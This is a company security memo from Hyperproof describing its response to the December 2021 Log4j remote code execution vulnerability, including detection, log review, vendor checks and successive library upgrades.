Log4j Vulnerability Update From Hyperproof
This is a memo from Hyperproof’s Security team written on Dec. 16, 2021. For additional questions, please contact the Hyperproof Security Team at firstname.lastname@example.org
Summary of vulnerability
A critical severity remote code execution vulnerability in Apache Log4j was published on Friday, December 10, 2021, in the NIST National Vulnerability Database (https://nvd.nist.gov/vuln/detail/CVE-2021-44228). An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Detection of vulnerability
Hyperproof’s Information Security Team was notified of this vulnerability shortly after its publication on Friday, December 10th by our automated vulnerability scanning tools.
The Hyperproof engineering team was engaged and confirmed that Log4j was used in our Java backend service only.
Additionally, the team reviewed our application logs and intrusion detection logs to confirm that there were no attempts to leverage this exploit in the Hyperproof application.
Finally, we reached out to and confirmed with our sub-service providers that any use of Log4j had been upgraded to 2.15.0+ or mitigated by turning off JDNI.
Following the guidelines in the service advisory, we immediately upgraded our version to 2.15.0 and deployed it to our production environment at 4 pm PDT on December 10th. An additional recommendation was issued on Monday, December 13th to further secure Log4j. Although our investigations showed that there was no way to exploit JNDI in our local environment, we upgraded to 2.16.0 in an abundance of caution and deployed the fix to production on Tuesday, December 14th at 5 pm PDT.
We additional updated to version 2.17.1 on Wednesday, December 29th to remain current, but the issue patched did not impact our services.